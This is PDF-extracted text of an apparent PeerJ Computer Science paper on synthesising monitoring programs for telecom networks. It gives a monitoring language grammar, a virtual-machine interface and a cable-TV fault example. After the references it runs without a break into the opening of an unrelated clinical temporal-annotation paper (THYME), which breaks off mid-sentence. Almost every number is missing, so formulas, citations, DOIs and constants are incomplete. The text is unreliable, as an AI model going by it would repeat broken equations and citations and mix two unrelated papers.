/peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. function directprogramsynthesis(maxlevel, m, currentm, targetm) is . m = findachievableelements(maxlevel, m, currentm, targetm) . if m.nonproven.length == do . for each l in [ ..maxlevel] do . m.transitionsequence = zip(zip(m.achievedwith[l], m.achievedwhile[l]), zip(m.achievedfrom[l], m.achievedto[l])) /* to get a list of quads of the form (function, condition, input, output)*/ . else error ‘no transition is found’ . return m method for restoring programs from the results of the proof based on backward inference below the description of the method is given. input data. {dw} - the sets of the input data elements; {ds} - the sets of the output data elements. target data elements are considered as the input, and the input data elements as the target elements because the inference is backward. output data. prg -models of monitoring programs. the pseudo-code of the method is the following: function backwrdprogramsynthesis(maxlevel, m, currentm, targetm) is the resulting program is a sequence of program structure elements that can be converted to program code written using scripting languages. complexity of multilevel synthesis of monitoring programs the upper boundary of time th required for program synthesis using the proposed method can be estimated by the following formula: th ≈c k∑ i= m i ≤c( k∑ i= mi) ( ) where: c –constant-coefficient; mi- the number of conditions on i-th level. it is necessary to mention that mi is essentially less than the total number of the conditions of the automata model. taking into account that on upper levels each inference step is equivalent to ni steps at the level ‘‘ ’’, one can get a lower boundary of time tl of multilevel synthesis of the programs, tl≈c k∑ i= m i n i ≤c k∑ i= m i ( ) the average estimate of time t of multilevel synthesis concerning ( ), ( ) is equal to t =(tl+th)/ . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . prg = initializeprogram . mproc = initializeprogrammodel . /* build the model of monitoring program using backward inference, targetm and currentm are swapped*/ . mproc = directprogramsynthesis(maxlevel, mproc, targetm, currentm) . mprog = reproducetransitionsequences(mproc) . /* build the model of the monitoring program according to the synthesized structure */ . for each l in [(maxlevel- ).. ] do . for each i in [ .. mproc.achievedwith[l].length] do . z = getfunkind(mproc.achievedwith[l][i]) . v = getfuntype(mproc.achievedwith[l][i]) . mprog.structureelements[l] = add(mprog.structureelements[l], buildstructureele- ment(z, v)) . end . for each i in [ .. mproc.achivedwhile[l].length] do . conditions = mproc.achivedwhile[l][i] . mprog.condition[l] = add(mprog.condition[l], buildconditions(conditions)) . end . mprog.program[l] = buildprogramforlevel(mprog.structureelements[l], mprog.condition[l]) . /* transform program structure elements of each level to the resulting program structure */ . prg = buildprogram(prg, mprog.program[l]) . end . return prg implementation of monitoring programs language for monitoring programs we design the language to describe the programs for monitoring of telecommunication networks. the programs are intended for execution on end-user devices. the following requirements were imposed on the capabilities of the language. the language should allow configurable filtering and data aggregation parameters, determine the composition of messages sent from the devices, specify commands for performing actions by the devices, and determine the conditions for their execution. vocabulary and syntax are defined for the modeling language. the vocabulary is presented in table , the syntax is given as follow: program=:‘module’ id ‘;’ (global_var_definition | function_definition)* < end of file> global_var_definition=:id(name) ‘=’ expression ‘;’ function_definition=:id(name) ‘(’ (id(param_name) (‘,’ id(param_name))*)? ‘)’ ‘{’ (statement)* ‘}’ statement =:expression ‘;’ | id(local_var) ‘=’ expression ‘;’ | ‘if’ ‘(’ expression ‘)’ statement (‘else’ statement)? | (id(label) ‘:’)? ‘while’ ‘(’ expression ‘)’ statement | (id(label) ‘:’)? ‘do’ statement ‘while’ ‘(’ expression ‘)’ ‘;’ tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table vocabulary of the modeling language. symbol desription space, tab, \n, \r separator // or /* */ comment [a-za-z_][ - a-za-z_]* identifier \’’ \n \r \t \xnn \\\ ’’ literal string {} block of code | (id(label) ‘:’)? ‘for’ ‘(’ initializer_list ‘;’ expression ‘;’ (expression (‘,’ expression)*)? ‘)’ statement | ‘{’ (statement)* ‘}’ | ‘break;’ | ‘return’ expression ‘;’ exression =:ternary ternary =:concatenation (‘?’ ternary ‘:’ ternary )? concatenation = logical (‘_’ logical)* logical =:comparison ((‘&&’ | ‘||’) comparison)* comparison =:math ((‘< ’ | ‘< =’ | ‘> ’ | ‘> =’ | ‘==’ | ‘!=’) math)? math =:muls ((‘+’ | ‘-’ muls)* muls =:unary ((‘*’ | ‘/’ | ‘%’ | ’*’ | ‘&’ | ‘|’ | ‘< < ’ | ‘> > ’) unary)* unary =:unary_head unary_tail unary_head=:numeric_const | string_literal | id(var_name) | (‘-’ | ‘∼’ | ‘!’ | ‘++’ | ‘–’) unary_head | ‘(’ expression ‘)’ | ‘[’ id(field_name) (‘,’ id(field_name))* ‘]’ ((‘*’ muls) / (‘{’ expression (‘,’ expression)* ‘}’))? ’ unary_tail=:‘[’ expression (‘:’ expression)? )‘]’ | (‘:=’ | ‘+=’ | ‘-=’ | ‘/=’ | ‘_=’ ....) expression | ‘(’ expression (‘,’ expression)* ‘)’ | ‘.’ id(field_name) | ‘++’ | ‘–’ the source codes of the programs are encoded in utf . the modeling language is a typed language. types are not converted to each other automatically. each expression has a type known at the compilation stage. types have no names. the same types are those that have the same constructors and the same sets of parameters. the language supports the following data types: int ( bits with a sign), bool (false | true), string (characters in utf- , addressed byte by byte), table (an array of variable size, containing structures with fields), link to a function, array of variable size. variables in the language are set in the form: ‘‘name = initializer’’. the type of initializer simultaneously sets the type of the variable. it is forbidden to declare an uninitialized tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. variable. variables starting with ‘‘_’’ are reserved for platform variable names (for example, _currenttime). a variable that has not been modified in the program code are considered as constant when compiled. global variables are initialized before the function that starts the program is called. they are initialized in the order of their declaration in the program. it is possible to access global variables before declaring them. if during the initialization of global variables functions are called, then in these functions, global variables that are not yet initialized cannot be used. changes in variables (assignment) is performed by a group of operators + =, & = b, etc. to assign a new value to a variable, the operator:: = is used. local variables are defined in context from the declaration point to the end of the block in which they are declared. local variables declared in the header of the for loop are defined in this header and the loop body. declaring two identical variables in the same context is not allowed. also, overriding (hiding) an external context variable is not allowed. the language provides the following control structures: block of operators, declaration of a local variable, expression, condition, loop, exit from the loop, exit from the function, and return value. the functions in the proposed modeling language are described in the form: ‘name (parameters) {actions}’. nested local functions are not supported, as this leads to the need to work with closures and increases the complexity of the program. the result of the return expression determines the type of result. the types of parameters are determined by the actual parameters passed in the first function call. the types of parameters in all calls must match because using polymorphism or instantiating templates can lead to an increase in the size of the generated code and to increase the time of program execution. functions can be called before they are declared. functions can be called directly, assigned to variables, passed as parameters, and returned as results. when working with strings, the following operations can be performed: assigning a literal constant, concatenation, obtaining the length of a string, converting a string to a number, converting a number to a string, receiving a substring, comparing strings, parsing a string and patterns, searching for a string in a table, parsing parameters. the following options are provided for working with the tables: create a table, create a table with initialization, access fields, get the number of records, insert records, delete records, search in the table by a numeric key, search in the table by a string key. when working with arrays, it is possible to create them, create with initialization, access elements, get the size, insert elements, delete elements, search for an element. the data is encoded by the int data type and corresponds to unix time. further extension of the developed language is possible, in particular, support of program interfaces, class structures, inheritance mechanisms. program models for monitoring the program is translated into a binary format. the translation is provided through a developed compiler. as a result of the translation, a program module is formed. during tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the conversion, the compiler checks the syntax of the program text, the consistency of the names, and the compatibility of the type. when describing a program in binary format, instructions in the general command language are used, which makes it possible to extend the developed language. instructions are strictly typed that allows high-speed program execution. the compactness of the binary programs is ensured by using language structures that are close to the solved monitoring tasks and by the compactness of the structures themselves. monitoring programs are intended for execution by the virtual machines. loading and unloading modules, their registration and calls assumed to be carried out through the software interface, which is provided by the machines: int vm_load_module (void* data); // data should be allocated with vm_alloc void vm_free_module (int id); size_t vm_lookup (char* fn_name); void vm_call (size_t ord, char* params); void *vm_alloc (size_t size); modules cannot call each other’s functions or exchange information. when the module is loaded, the start () function that registers the named event handlers is executed. the predefined handlers are the following: ‘‘t’’ –a timer handler that is called once a second in the idle mode; ‘‘c’’ –a handler that is called in response to a console command; ‘‘s’’ –a handler that is called, before sending any packet, allows adding the necessary fields and events to the packet. parameters are passed to the handlers as text strings with separators ‘‘|’’. in the language, the operators that allow extract parameters from the strings of this format are supported. // if called myhandler(‘‘ |hello’’); myhandler(p) { screen = intarg(); // screen = mode = strarg(); // mode = ‘‘hello’’; ... } the loadable modules have access to the sets of system variables, parameters provided by system functions. they can initiate actions that can be performed by the system functions. timerproc(s) { if (_systemmemfree < * ) reboot(); } when executing code in a virtual machine, the following verification procedures are performed: availability of free memory, stack overflow error, looping, index out of array bounds error, accessing uninitialized fields, division by zero, getting the remainder of division by zero. when an exception occurs, the module is unloaded, and its resources are freed, then its handler stops perceiving information about external events. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a virtual machine for monitoring the synthesized monitoring programs are executed by the virtual machine (vm) [ ], whose structure is shown in fig. . the main elements of the virtual machine are the following: cn (computer network) agent - an application running on a network element and containing a virtual machine (cn vm) in which program modules are executed; cn vm (virtual machine) –the environment for the program modules execution; cm vm prodmodule - an agent which logic is determined by the synthesized programs that are loaded on the elements of the networks; logger –an element of the network that is responsible for collecting and providing log files produced by the elements of the networks. the logic of using the virtual machine is as follows. program modules are compiled for each of the synthesized programs. the modules are placed on the data provider. when new modules appear, they are loaded into the vm. to load the modules, dts is used. vm ensures the execution of the modules. the logic of data gathering and data processing that is defined by the loaded program modules can be executed once, in the loop, or on the event. the gathered data is recorded during the execution of the module by the logger. the collected data is transmitted to the monitoring system. there is a possibility for messages exchanging between the vm and the monitoring system. the cn listener provides it. the monitoring system can manage the virtual machine using the command manager. discussion the proposed method for program synthesis can be used for a number of real-life applications. the cable tv network monitoring system is taken as a typical example of a telecommunication network. a common cable tv network contains one or more servers that serve tv receivers of the end-users. the receivers provide users a variety of services for watching tv. the task of the monitoring systems is to identify the errors that occur on the devices of the end-users, to localize them, and find their causes. monitoring systems are deployed on the servers, and the virtual machines are installed on tv receivers. program modules for monitoring are synthesized on the servers and are executed by the virtual machines. the software of the tv receivers has a multi-level structure. the software of the upper levels provides the logic of the user’s services. on the low levels, the interaction with technical means is implemented. the number and composition of the intermediate levels depend on the type of receivers. the intermediate levels can include a level of the primary functions and a transport level. the state of each user service is characterized by several parameters related to different levels of the software structure. there are links between the parameters of different levels. the primary user services include image display services (video), services of individual delivery of television programs and films to subscribers (vod (video on demand, vod), services for viewing private live broadcasts (ppv (pay per view, ppv) and others. to the tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure monitoring virtual machine structure. full-size doi: . /peerjcs. /fig- essential services refer electronic program guide service (epg), service for writing data to disk (dvr), authorization service (authorization), service for switching between channels (chanelsw), etc. transport level services allow receive/transmit data to external systems. these services receive data from the tuner (tuning service), decode incoming data streams (decoding service). an error in the operation of any service results in malfunctioning of one or several end-user services. regular monitoring assumes control of the parameters that characterize the state of the end-user services, including video, vod, and ppv services. these parameters are no_video, no_vod, no_ppv. they take the value ’true’ when errors occur in the working of these services. if one of the parameters takes the value ’true’, a message is formed on the tv receiver and transmitted to the monitoring system. after receiving one such message, the monitoring system synthesizes a new monitoring program for collecting data necessary to localize the error and identify its cause. the synthesized program is compiled and loaded on the receiver that has sent the message. a model of the process of regular monitoring of a user service is presented in fig. . the monitoring process may be in one of the following states: initial state s and final state s , processing of a parameter s , service is fully functional s , service is malfunctioning s , sending an error message about service failure s . the values of the controlled parameters determine transitions between the states. if an error occurs, the newly synthesized programs provide a collection of additional parameters related to services provided by the software of the lower levels. in this case, the process model has a structure that is shown in fig. . the following states are defined in the model: initial state s , final state s , collection of an extended set of parameters s , processing of an extended set of parameters s , service is fully functional s , service is tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure model of the regular monitoring process. full-size doi: . /peerjcs. /fig- figure model of the monitoring process in case an error occurs in the work of a service. full-size doi: . /peerjcs. /fig- malfunctioning s , sending an error message about the service failure s , sending collected additional parameters s . consider the situation when there is no image on the user’s screen, i.e., no_video error has occurred. other upper-level services, in particular, vod and ppv, are operating normally. thus, the initial state of the users’ device is described by the following vector of the parameters {no_video, vod, ppv}, the output vector is defined as {video}. the output vector corresponds to the state of the device when there is an image on the screen. fig. shows the scheme of the synthesis that allows reaching the state {video} from the state {no_video, vod, ppv}. the synthesis is carried out in two directions - direct and reverse. within the direct synthesis, the possibilities of transition from {no_video, vod, ppv} to {video} are considered. if such possibilities exist, then reverse synthesis allows building programs of monitoring on the base of identified possibilities. figure shows the services of various levels and links between them. the descriptions of the software structure determine the links between the services. the solid line indicates known links that exist. the dotted lines show the links that should exist when the video service is fully functional. according to the fig. , the result of the direct synthesis is the vector {dvr, epg, decoding, authorization, chanelsw}. the state of the tuning service is unknown, but it is required to identify the possibility of reaching the state {video}. using the reverse tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the scheme of the synthesis of the monitoring programs to identify the cause of no image on users tv screens. full-size doi: . /peerjcs. /fig- synthesis, the sequence {video} -> {tuning} -> {no_video} is constructed. following this sequence, it is necessary to check the tuner’s function of data receiving. a dozen parameters characterize the status of the tuner function of data received. the types of tuners determine them. the synthesized monitoring program contains commands for collecting the required set of parameters. below fragments of synthesized programs are presented. the following program is used for regular monitoring of the state of the video service: module main; // event code assignment no_video_event = < event_code> ; start(){ // event registration register(‘‘dc:novideo()’’,novideo); } sendalertnovideo(){ alerttime = _currenttime; { reportint(no_video_event); reportint(alerttime); return true; } return false; } tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the program below provides the collection of additional parameters that allow find the causes of no image on the users’ screens: module main; start(){ // standard initialization procedures ... //gathering required parameters reportint(vm_ia_firsttunerparam); reportint(vm_ia_secondtunerparam); ... reportint(vm_ia_ntunerparam); // standard termination procedures ... } conclusion in the article, the multilevel synthesis of programs for telecommunication networks monitoring is discussed. a new method for monitoring dynamic networks with a multilevel structure is proposed. a new language for describing monitoring programs has been developed. the programs are translated into binary code using a compiler. the compiled programs can be executed in monitoring systems and on end-user devices. for this, a new virtual machine that is installed on the elements of the network has been designed and implemented. the value of the proposed multilevel synthesis is that it offers the possibility to build reconfigurable monitoring systems for telecommunication networks. the proposed method can be used for telecommunication networks monitoring in a wide range of subject domains. further development of the ideas of multilevel synthesis of monitoring programs assumes its application for a wide range of subject domains. additional information and declarations funding the paper was prepared in saint–petersburg electrotechnical university (leti), and is supported by the agreement no - - - dated . . (ministry of science and higher education of the russian federation, in accordance with the decree of the government of the russian federation of april , no. ), project "creation of a domestic high-tech production of vehicle security systems based on a control mechanism and intelligent sensors, including millimeter radars in the - ghz range". the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: ministry of science and higher education of the russian federation: - - - . competing interests andrey kalmatskiy and natalia alexandrovna zhukova were employees of zodiac systems, russia & usa. andrey kalmatskiy is currently an employee of google, usa. author contributions • man tianxing conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • vasiliy yurievich osipov, alexander ivanovich vodyaho and andrey kalmatskiy conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • natalia alexandrovna zhukova performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • sergey vyacheslavovich lebedev performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • yulia alexandrovna shichkina analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available at github: https://github.com/karol /lispy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references al mamun ma, hannan m, hussain a, basri h. . theoretical model and implementation of a real time intelligent bin status monitoring system using rule based decision algorithms. expert systems with applications : – doi . /j.eswa. . . . baig mm, gholamhosseini h, moqeem aa, mirza f, lindén m. . a sys- tematic review of wearable patient monitoring systems–current challenges and opportunities for clinical adoption. journal of medical systems ( ): doi . /s - - - . bello jp, silva c, nov o, dubois rl, arora a, salamon j, mydlarz c, doraiswamy h. . sonyc: a system for the monitoring, analysis and mitigation of urban noise pollution. arxiv preprint. arxiv: . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/karol /lispy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ http://dx.doi.org/ . /peerj-cs. cabal-yepez e, garcia-ramirez ag, romero-troncoso rj, garcia-perez a, osornio- rios ra. . reconfigurable monitoring system for time-frequency analysis on industrial equipment through stft and dwt. ieee transactions on industrial informatics : – doi . /tii. . . chakravarthi mk, tiwari rk, handa s. . accelerometer based static gesture recog- nition and mobile monitoring system using neural networks. procedia computer science : – doi . /j.procs. . . . cong j, liu b, neuendorffer s, noguera j, vissers k, zhang z. . high-level synthesis for fpgas: from prototyping to deployment. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . cong j, minkovich k. . optimality study of logic synthesis for lut-based fpgas. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . dovžan d, logar v, Škrjanc i. . implementation of an evolving fuzzy model (efumo) in a monitoring system for a waste-water treatment process. ieee trans- actions on fuzzy systems : – doi . /tfuzz. . . eissa m, elmesalawy mm, hadhoud mm. . wide area monitoring system based on the third generation universal mobile telecommunication system (umts) for event identification. international journal of electrical power & energy systems : – doi . /j.ijepes. . . . fu h. . equalization for high-speed serial interfaces in xilinx series fpga transceivers. xilinx white paper. : available at https://www.xilinx.com/support/ documentation/white_papers/wp - series-xcvr-equalization.pdf . gaikwad n, mistry y. . review on environment monitoring system and energy efficiency. international journal of engineering research and applications : – . ge z, song z, gao f. . review of recent research on data-based process monitoring. industrial & engineering chemistry research : – doi . /ie q. koetter f, kochanowski m. . a model-driven approach for event-based business process monitoring. information systems and e-business management : – doi . /s - - - . korableva o, kalimullina o, kurbanova e. . building the monitoring systems for complex distributed systems: problems and solutions. iceis : – . kumar a, kim h, hancke gp. . environmental monitoring systems: a review. ieee sensors journal : – . lyke jc, christodoulou cg, vera ga, edwards ah. . an introduction to reconfig- urable systems. proceedings of the ieee : – doi . /jproc. . . lysecky r, vahid f, tan sx-d. . dynamic fpga routing for just-in-time fpga compilation. in: proceedings of the st annual design automation conference. acm, – . maksymyuk t, dumych s, brych m, satria d, jo m. . an iot based monitoring framework for software defined g mobile networks. in: proceedings of the th tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /j.ijepes. . . https://www.xilinx.com/support/documentation/white_papers/wp - series-xcvr-equalization.pdf https://www.xilinx.com/support/documentation/white_papers/wp - series-xcvr-equalization.pdf http://dx.doi.org/ . /ie q http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /peerj-cs. international conference on ubiquitous information management and communication. – . morgan j, o’donell g. . a service-oriented reconfigurable process monitoring system-enabling cyber physical systems. journal of machine engineering : – . morgan j, o’donnell ge. . cyber physical process monitoring systems. journal of intelligent manufacturing : – doi . /s - - -z. mukhopadhyay sc. . wearable sensors for human activity monitoring: a review. ieee sensors journal : – doi . /jsen. . . myint cz, gopal l, aung yl. . reconfigurable smart water quality monitoring system in iot environment. in: ieee/acis th international conference on computer and information science (icis). piscataway: ieee, – . osipov vy, vodyaho ai, zhukova na, glebovsky pa. . multilevel automatic synthesis of behavioral programs for smart devices. in: international conference on control, artificial intelligence, robotics & optimization (iccairo). ieee, – . osipov vy. . automatic synthesis of action programs for intelligent robots. pro- gramming & computer software ( ): – doi . /s . raju krsr, varma ghk. . knowledge based real time monitoring system for aquaculture using iot. in: ieee th international advance computing conference (iacc). piscataway: ieee, – . rubin r, dehon a. . choose-your-own-adventure routing: lightweight load-time defect avoidance. acm transactions on reconfigurable technology and systems (trets) ( ): – doi . / . . sakhardande p, hanagal s, kulkarni s. . design of disaster management system using iot based interconnected network with smart city monitoring. in: international conference on internet of things and applications (iota). piscataway: ieee, – . shichkina y, kataeva g, irishina y, stanevich e. . the architecture of the system for monitoring the status in patients with parkinson’s disease using mobile technologies. studies in computational intelligence : – . silva n, marques er, lopes lm. . flux: a platform for dynamically reconfigurable mobile crowd-sensing. acm transactions on sensor networks (tosn) ( – ): – doi . / . singh r, gernaey kv, gani r. . an ontological knowledge-based system for the selection of process monitoring and analysis tools. computers & chemical engineering : – doi . /j.compchemeng. . . . sohn h, farrar cr, hemez fm, shunk dd, stinemates dw, nadler br, czarnecki jj. . a review of structural health monitoring literature: – . usa: los alamos national laboratory. stefanov k, voevodin v, zhumatiy s, voevodin v. . dynamically reconfigurable distributed modular monitoring system for supercomputers (dimmon). procedia computer science : – doi . /j.procs. . . . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /s http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.compchemeng. . . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. suma n, samson sr, saranya s, shanmugapriya g, subhashri r. . iot based smart agriculture monitoring system. international journal on recent and innovation trends in computing and communication : – . thompson a. . hardware evolution: automatic design of electronic circuits in reconfig- urable hardware by artificial evolution. london: springer science & business media doi . / - - - - . yang z, zhou q, lei l, zheng k, xiang w. . an iot-cloud based wearable ecg monitoring system for smart healthcare. journal of medical systems ( ): doi . /s - - - . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. uc san diego uc san diego previously published works title temporal annotation in the clinical domain. permalink https://escholarship.org/uc/item/ sk m q journal transactions of the association for computational linguistics, issn - x authors styler, william f bethard, steven finan, sean et al. publication date - - doi . /tacl_a_ peer reviewed escholarship.org powered by the california digital library university of california https://escholarship.org/uc/item/ sk m q https://escholarship.org/uc/item/ sk m q#author https://escholarship.org http://www.cdlib.org/ temporal annotation in the clinical domain william f. styler iv , steven bethard , sean finan , martha palmer , sameer pradhan , piet c de groen , brad erickson , timothy miller , chen lin , guergana savova and james pustejovsky department of linguistics, university of colorado at boulder department of computer and information sciences, university of alabama at birmingham children’s hospital boston informatics program and harvard medical school mayo clinic college of medicine, mayo clinic, rochester, mn department of computer science, brandeis university abstract this article discusses the requirements of a formal specification for the annotation of temporal information in clinical narratives. we discuss the implementation and extension of iso-timeml for annotating a corpus of clinical notes, known as the thyme cor- pus. to reflect the information task and the heavily inference-based reasoning demands in the domain, a new annotation guideline has been developed, “the thyme guidelines to iso-timeml (thyme-timeml)”. to clarify what relations merit annotation, we distinguish between linguistically-derived and inferentially-derived temporal orderings in the text. we also apply a top performing temp- eval system against this new resource to measure the difficulty of adapting systems to the clinical domain. the corpus is available to the community and has been proposed for use in a semeval task. introduction there is a long-standing interest in temporal reason- ing within the biomedical community (savova et al., ; hripcsak et al., ; meystre et al., ; bramsen et al., ; combi et al., ; keravnou, ; dolin, ; irvine et al., ; sullivan et al., ). this interest extends to the automatic ex- traction and interpretation of temporal information from medical texts, such as electronic discharge sum- maries and patient case summaries. making effective use of temporal information from such narratives is a crucial step in the intelligent analysis of informat- ics for medical researchers, while an awareness of temporal information (both implicit and explicit) in a text is also necessary for many data mining tasks. it has also been demonstrated that the temporal in- formation in clinical narratives can be usefully mined to provide information for some higher-level tempo- ral reasoning (zhao et al., ). robust temporal understanding of such narratives, however, has been difficult to achieve, due to the complexity of deter- mining temporal relations among events, the diver- sity of temporal expressions, and the interaction with broader computational linguistic issues. recent work on electronic health records (ehrs) points to new ways to exploit and mine the informa- tion contained therein (savova et al., ; roberts et al., ; zheng et al., ; turchin et al., ). we target two main use cases for extracted data. first, we hope to enable interactive displays and summaries of the patient’s records to the physician at the time of visit, making a comprehensive review of the patient’s history both faster and less prone to oversights. sec- ond, we hope to enable temporally-aware secondary research across large databases of medical records (e.g., “what percentage of patients who undergo pro- cedure x develop side-effect y within z months?”). both of these applications require the extraction of time and date associations for critical events and the relative ordering of events during the patient’s period of care, all from the various records which make up a patient’s ehr. although we have these two specific applications in mind, the schema we have developed is generalizable and could potentially be embedded in a wide variety of biomedical use cases. narrative texts in ehrs are temporally rich doc- uments that frequently contain assertions about the timing of medical events, such as visits, laboratory values, symptoms, signs, diagnoses, and procedures (bramsen et al., ; hripcsak et al., ; zhou et al., ). temporal representation and reason- ing in the medical record are difficult due to: ( ) the diversity of time expressions; ( ) the complexity of determining temporal relations among events (which are often left to inference); ( ) the difficulty of han- dling the temporal granularity of an event; and ( ) transactions of the association for computational linguistics, ( ) – . action editor: ellen riloff. submitted / ; revised / ; published / . c© association for computational linguistics. general issues in natural language processing (e.g., ambiguity, anaphora, ellipsis, conjunction). as a re- sult, the signals used for reconstructing a timeline can be both domain-specific and complex, and are often left implicit, requiring significant domain knowledge to accurately detect and interpret. in this paper, we discuss the demands on accurately annotating such temporal information in clinical notes. we describe an implementation and extension of iso-timeml (pustejovsky et al., ), devel- oped specifically for the clinical domain, which we refer to as the “thyme guidelines to iso-timeml” (“thyme-timeml”), where thyme stands for “temporal histories of your medical events”. a sim- plified version of these guidelines formed the basis for the i b medical-domain temporal relation challenge (sun et al., a). this is being developed in the context of the thyme project, whose goal is to both create ro- bust gold standards for semantic information in clini- cal notes, as well as to develop state-of-the-art algo- rithms to train and test on this dataset. deriving timelines from news text requires the con- crete realization of context-dependent assumptions about temporal intervals, orderings and organization, underlying the explicit signals marked in the text (pustejovsky and stubbs, ). deriving patient history timelines from clinical notes also involves these types of assumptions, but there are special de- mands imposed by the characteristics of the clinical narrative. due to both medical shorthand practices and general domain knowledge, many event-event relations are not signaled in the text at all, and rely on a shared understanding and common conceptual models of the progressions of medical procedures available only to readers familiar with language use in the medical community. identifying these implicit relations and temporal properties puts a heavy burden on the annotation process. as such, in the thyme-timeml guideline, considerable effort has gone into both describing and proscribing the annotation of temporal orderings that are inferable only through domain-specific temporal knowledge. although the thyme guidelines describe a num- ber of departures from the iso-timeml standard for expediency and ease of annotation, this paper will focus on those differences specifically motivated by the needs of the clinical domain, and on the conse- quences for systems built to extract temporal data in both the clinical and general domain. the nature of clinical documents in the thyme corpus, we have been examining , de-identified notes from a large healthcare practice (the mayo clinic), representing two distinct fields within oncology: brain cancer, and colon can- cer. to date, we have principally examined two dif- ferent general types of clinical narrative in our ehrs: clinical notes and pathology reports. clinical notes are records of physician interactions with a patient, and often include multiple, clearly delineated sections detailing different aspects of the patient’s care and present illness. these notes are fairly generic across institutions and specialities, and although some terms and inferences may be specific to a particular type of practice (such as oncology), they share a uniform structure and pattern. the ‘his- tory of present illness’, for example, summarizes the course of the patient’s chief complaint, as well as the interventions and diagnostics which have been thus far attempted. in other sections, the doctor may out- line her current plan for the patient’s treatment, then later describe the patient’s specific medical history, allergies, care directives, and so forth. most critically for temporal reasoning, each clin- ical note reflects a single time in the patient’s treat- ment history at which all of the doctor’s statements are accurate (the doctime), and each section tends to describe events of a particular timeframe. for example, ‘history of present illness’ predominantly describes events occuring before doctime, whereas ‘medications’ provides a snapshot at doctime and ‘ongoing care orders’ discusses events which have not yet occurred. clinical notes contain rich temporal information and background, moving fluidly from prior treat- ments and symptoms to present conditions to future interventions. they are also often rich with hypo- thetical statements (“if the tumor recurs, we can...”), each of which can form its own separate timeline. by constrast, pathology notes are quite different. such notes are generated by a medical pathologist although most patient information was removed, dates and temporal information were not modified according to this project’s specific data use agreement. one complication is the propensity of doctors and automated systems to later update sections in a note without changing the timestamp or metadata. we have added a sectiontime to keep these updated sections from affecting our overall timeline. upon receipt and analysis of specimens (ranging from tissue samples from biopsy to excised portions of tumor or organs). pathology notes provide crucial information to the patient’s doctor confirming the malignancy (cancer) in samples, describing surgi- cal margins (which indicate whether a tumor was completely excised), and classifying and ‘staging’ a tumor, describing the severity and spread of the can- cer. because the information in such notes pertains to samples taken at a single moment in time, they are temporally sparse, seldom referring to events before or after the examination of the specimen. however, they contain critical information about the state of the patient’s illness and about the cancer itself, and must be interpreted to understand the history of the patient’s illness. most importantly, in all ehrs, we must contend with the results of a fundamental tension in mod- ern medical records: hyper-detailed records provide a crucial defense against malpractice litigation, but including such detail takes enormous time, which doctors seldom have. given that these notes are writ- ten by and for medical professionals (who form a relatively insular speech community), a great many non-standard expressions, abbreviations, and assump- tions of shared knowledge are used, which are simul- taneously concise and detail-rich for others who have similar backgrounds. these time-saving devices can range from tempo- rally loaded acronyms (e.g., ‘qid’, latin for quater in die, ‘four times daily’), to assumed orderings (a diag- nostic test for a disorder is assumed to come before the procedure which treats it), and even to completely implicit events and temporal details. for example, consider the sentence in ( ). ( ) colonoscopy / / , nodule biopsies negative we must understand that during the colonoscopy, the doctor obtained biopsies of nodules, which were packaged and sent to a pathologist, who reviewed them and determined them to be ‘negative’ (non- cancerous). in such documents, we must recover as much tem- poral detail as possible, even though it may be ex- pressed in a way which is not easily understood out- side of the medical community, let alone by linguists or automated systems. we must also be aware of the legal relevance of some events (e.g., “we discussed the possible side effects”), even when they may not seem relevant to the patient’s actual care. finally, each specialty and note type has separate conventions. within colon cancer notes, the amer- ican 